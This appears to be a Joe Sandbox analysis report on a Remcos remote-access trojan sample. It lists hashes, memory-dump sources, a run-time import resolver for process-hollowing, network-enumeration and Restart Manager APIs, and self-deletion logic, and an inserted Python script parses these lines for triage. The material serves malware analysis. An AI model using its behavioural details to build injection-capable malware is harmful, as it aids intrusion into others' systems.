                        • Instruction ID: 15dddcc3b518ead0ad4f24ec222b8f5e57fd8d7a968aeff972c6f9326d923ec2
                        • Opcode Fuzzy Hash: e83b8b0f609370a783bc15a841701a5bacc115b909bbcb9ae998ebbff27516bf
                        • Instruction Fuzzy Hash: B911F2B58003499FDB20DF9AD844BDEFBF8EB48320F10841AE568A7201C375A944CFA5
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 62850f03201a92f7a7677c7c67a4be00c189b60173020051b0219ae1e3c17fb2
                        • Instruction ID: d185b049913aa2b25e6b57ac19caf00debc607a83d8ca72a841c34c58b3eafc8
                        • Opcode Fuzzy Hash: 62850f03201a92f7a7677c7c67a4be00c189b60173020051b0219ae1e3c17fb2
                        • Instruction Fuzzy Hash: AD1158B19043898FDB20DFA9C4417EEFBF0AF84314F24885EC155A7251C7759544CF95
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07AB498D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2214252773.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7ab0000_jdSldfVS.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: b4eeaeb1fc20511f9b742bf652aad8d7942664e720fd4e787f40d26c2bb819a2
                        • Instruction ID: 542e1c3422c126db8cd7a06351d15941b7c33dd04b501abed836f83b06d2f1b2
                        • Opcode Fuzzy Hash: b4eeaeb1fc20511f9b742bf652aad8d7942664e720fd4e787f40d26c2bb819a2
                        • Instruction Fuzzy Hash: DE11C5B58003499FDB20DF9AD445BDEFBF8EB48324F20841AE564A7611C375A544CFA5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53c30014ec2276cc114ce1fb5e8ae5da62b2a5bd0a3a4502c49784eadbe442b3
                        • Instruction ID: 6b21d07e1ee296ea43e085c131404effae281a2faecf51cae0794c1d1137e33d
                        • Opcode Fuzzy Hash: 53c30014ec2276cc114ce1fb5e8ae5da62b2a5bd0a3a4502c49784eadbe442b3
                        • Instruction Fuzzy Hash: 1C21E072504200DFDB069F94D980B2ABBB5FBC8320F608569F9090F246C336D456CBA1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 865fd7f929ccb5c39d8d86338ccdd6922dd32af2a7b7e8bad114e8dc57bd794e
                        • Instruction ID: fadb2c8625fcff3785d97e8c6775b214e628b710517c5630a9f8e39fc74f614e
                        • Opcode Fuzzy Hash: 865fd7f929ccb5c39d8d86338ccdd6922dd32af2a7b7e8bad114e8dc57bd794e
                        • Instruction Fuzzy Hash: 45210072100204DFDB01DF54D980B5ABBB5FBC8324F208568E9090F256C37AE456CAA1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 798ea4750bd5e4c4febb364ca9a7d4d01010f53aac061362c67b30b8108c76f7
                        • Instruction ID: e23ae56762f4e14de1e3b0c7239deacfbf8f2a1eefe3be1b4156aec7a15bd19e
                        • Opcode Fuzzy Hash: 798ea4750bd5e4c4febb364ca9a7d4d01010f53aac061362c67b30b8108c76f7
                        • Instruction Fuzzy Hash: 3721D771608204EFDB05DF94D5C4B1ABBB5FB94328F24CA6DE9094F252C37AD446CA61
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8b599259587d6fac404dc38d9862fa7f22170c24996c1aa2d9c7ae93c06da5d
                        • Instruction ID: 5501b2d873dd08f95c361b9345644bbc603cb47cf8380ef63a5eee0847acc4ab
                        • Opcode Fuzzy Hash: e8b599259587d6fac404dc38d9862fa7f22170c24996c1aa2d9c7ae93c06da5d
                        • Instruction Fuzzy Hash: B1212271604204DFDB15DF94D984B2ABBB1FB94318F20C96DD90E4F286D33AD447CA61
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31fe462689eabcbf0706f6fbef0c112dac84bb78a2d2668c7958e6eadd2a7c94
                        • Instruction ID: 78d3f2a5a4b95c601ad206932866bc1b79ee5098671faa474556f09a25284345
                        • Opcode Fuzzy Hash: 31fe462689eabcbf0706f6fbef0c112dac84bb78a2d2668c7958e6eadd2a7c94
                        • Instruction Fuzzy Hash: 872192755093808FCB13CF64D994715BF71FB46218F28C5DAD8498F2A7C33A980ACB62
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97b80ae79017b4ed6bea6dd9b7a80ca74a39b088e4df1c4c2e3fdfc2e958b63e
                        • Instruction ID: 958ab6094429bf4ee136c03290ef4e697d390bff4c0d69b3e45c2c101eff2d77
                        • Opcode Fuzzy Hash: 97b80ae79017b4ed6bea6dd9b7a80ca74a39b088e4df1c4c2e3fdfc2e958b63e
                        • Instruction Fuzzy Hash: C6218C76504244DFDB06CF54D9C4B5ABF72FB84224F2485A9ED090B656C33AD42ACBA1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                        • Instruction ID: 225b22155be341ccb9b3350c5dfcc10ba702937b7aa74533e6fc80e8b330d72e
                        • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                        • Instruction Fuzzy Hash: D411CD72404240CFCB02CF54D5C0B5ABF71FB84224F2482A9D8090F257C37AE456CBA1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205516316.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_154d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                        • Instruction ID: 735318acccb9169e4228228883ff820f26c922ad02ad365866914c2afb931ad9
                        • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                        • Instruction Fuzzy Hash: B011BB75508280DFCB02CF54C5C4B19BBB1FB84228F24C6A9D8494F296C33AD40ACB61
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 27dc13e9c878ec06ef909e32a559c8e36b6e3ac6036718f42efa7a5261262d7a
                        • Instruction ID: df9657f6464f504eea210aa3e164fd7f7b936f324c1cf100fa4cff994cb57528
                        • Opcode Fuzzy Hash: 27dc13e9c878ec06ef909e32a559c8e36b6e3ac6036718f42efa7a5261262d7a
                        • Instruction Fuzzy Hash: 8701F7710043849AE7128AA9CC84B67FFF8FF81220F58881AED084F282C339D845C671
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2205456814.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_153d000_jdSldfVS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b5febc22ee7d4638a53618d440ddd75ffbd5680fc84bfdccc05d4822542c6aca
                        • Instruction ID: 46dfc7de041eb70200231509017d5a6dfd5bd2b993ed241a007d58ee649d95bf
                        • Opcode Fuzzy Hash: b5febc22ee7d4638a53618d440ddd75ffbd5680fc84bfdccc05d4822542c6aca
                        • Instruction Fuzzy Hash: 3CF062724053849EE7158A5ADC84B66FFB8FF81625F18C45AED084F287C3799844CAB1

                        Execution Graph

                        Execution Coverage: 1.2%
                        Dynamic/Decrypted Code Coverage: 0%
                        Signature Coverage: 4%
                        Total number of Nodes: 544
                        Total number of Limit Nodes: 14

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                        • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad$HandleModule
                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                        • API String ID: 4236061018-3687161714
                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 4432b5; basic blocks 4432b5-4432ef
                        • Calls in flow order: 448cc9, GetPEB, GetCurrentProcess, TerminateProcess, 44333a, ExitProcess
                        APIs
                        • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                        • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                        • ExitProcess.KERNEL32 ref: 004432EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID: PkGNG
                        • API String ID: 1703294689-263838557
                        • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                        • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                        • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                        • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 40e9c5; basic blocks 40e9c5-40f3af; first call is the import resolver at 41cb50
                        • Named API calls: GetModuleFileNameW (entry block), CreateThread at seven sites (40efc3, 40f0c8, 40f11d, 40f16e, 40f243, 40f258, 40f26d), StrToIntA (40efea-40f0c6), DeleteFileW retried after Sleep in the 40f32f-40f34b loop
                        APIs
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000104), ref: 0040E9EE
                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\jdSldfVS.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                        • API String ID: 2830904901-3961372815
                        • Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                        • Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
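The resolver at 0041CB50 and its continuation at 0041CCBA-0041CD4C show the sample fetching its sensitive imports at run time: LoadLibraryA or GetModuleHandleA with the library name, then GetProcAddress with the export name that Joe Sandbox prints in the second stack slot. None of these names reach the static import table, so the report lines are the only place the full list is visible. The Python below is an added example by the editor, not part of the Joe Sandbox report: it parses lines in the report's own format into a library/export table, attaches a triage hint per export, and pulls out the ntdll exports typical of PE injection. The hint mapping is the editor's interpretation, and the sample lines are copied from the entries above.

```python
"""Rebuild a dynamically resolved import table from Joe Sandbox API lines (editor's example)."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# One resolver line as the report prints it, e.g.
#   LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
# The values in parentheses are stack slots at the call site: slot 1 is the library name
# passed to LoadLibraryA/GetModuleHandleA, slot 2 is the export name the following
# GetProcAddress resolves.  A slot 2 that is not an identifier (0000000C on the Shlwapi
# line) is not a by-name lookup and is skipped.
RESOLVER_RE = re.compile(
    r"(?P<api>LoadLibraryA|GetModuleHandleA)\.(?:KERNEL32|KERNELBASE)\("
    r"(?P<lib>[A-Za-z0-9_]+),(?P<export>[A-Za-z][A-Za-z0-9_]*)[^)]*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Why each export matters for triage.  Editor's reading, not a Joe Sandbox signature.
CAPABILITY_HINTS = {
    "NtUnmapViewOfSection": "unmap a target image: classic process hollowing step",
    "NtSuspendProcess": "freeze a target process around injection",
    "NtResumeProcess": "resume a target process after injection",
    "NtQueryInformationProcess": "read PEB / debug-port information of a process",
    "GetExtendedTcpTable": "enumerate TCP connections with owning PIDs",
    "GetExtendedUdpTable": "enumerate UDP endpoints with owning PIDs",
    "RmStartSession": "Restart Manager: find processes holding a file open",
    "RmRegisterResources": "Restart Manager: register the locked file",
    "RmGetList": "Restart Manager: list the locking processes",
    "RmEndSession": "Restart Manager: close the session",
    "IsUserAnAdmin": "privilege check (install path / UAC bypass decision)",
    "SetProcessDEPPolicy": "change DEP policy for the current process",
    "GetProcessImageFileNameW": "map a PID to its image path",
    "GlobalMemoryStatusEx": "physical RAM size (a common VM/sandbox heuristic)",
    "EnumDisplayDevicesW": "display adapter enumeration (fingerprinting)",
    "EnumDisplayMonitors": "monitor enumeration (screen capture setup)",
    "GetMonitorInfoW": "monitor geometry (screen capture setup)",
    "GetFinalPathNameByHandleW": "resolve an open handle back to a path",
}


def parse_resolver_lines(lines) -> Dict[str, List[Tuple[str, str]]]:
    """Map lower-cased library name -> [(export, call-site address)] in report order."""
    table: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for line in lines:
        m = RESOLVER_RE.search(line)
        if m is None:
            continue                      # GetProcAddress lines, ordinals, unrelated APIs
        table[m.group("lib").lower()].append((m.group("export"), m.group("ref").upper()))
    return dict(table)


def annotate(table) -> List[Tuple[str, str, str, str]]:
    """Flatten to (library, export, call-site, hint); hint is '' for unlisted exports."""
    return [(lib, export, ref, CAPABILITY_HINTS.get(export, ""))
            for lib, entries in table.items() for export, ref in entries]


def injection_exports(table) -> List[str]:
    """ntdll exports in the table that are typical of PE injection, sorted."""
    wanted = {"NtUnmapViewOfSection", "NtSuspendProcess", "NtResumeProcess"}
    return sorted(e for e, _ in table.get("ntdll", []) if e in wanted)


# Lines copied from the resolver entries in this report.
SAMPLE_LINES = [
    "• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC",
    "• GetProcAddress.KERNEL32(00000000), ref: 0041CCCF",
    "• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC",
    "• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0",
    "• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04",
    "• LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19",
    "• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39",
    "• Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3",
    "• Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E",
    "• Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83",
]

if __name__ == "__main__":
    for lib, export, ref, hint in annotate(parse_resolver_lines(SAMPLE_LINES)):
        print(f"{ref}  {lib:<10} {export:<28} {hint}")
```

The call-site address is kept with each export because it is the anchor you need when cross-referencing the IDA snapshot (hcaresult_17_2_400000_jdSldfVS.jbxd) or writing a breakpoint for a debugger session on the dumped image.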

                        Control-flow Graph

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                        • SetEvent.KERNEL32(?), ref: 00404E43
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                        • closesocket.WS2_32(?), ref: 00404E5A
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                        • SetEvent.KERNEL32(?), ref: 00404EA2
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                        • SetEvent.KERNEL32(?), ref: 00404EBA
                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                        • SetEvent.KERNEL32(?), ref: 00404ED1
                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                        • String ID: PkGNG
                        • API String ID: 2403171778-263838557
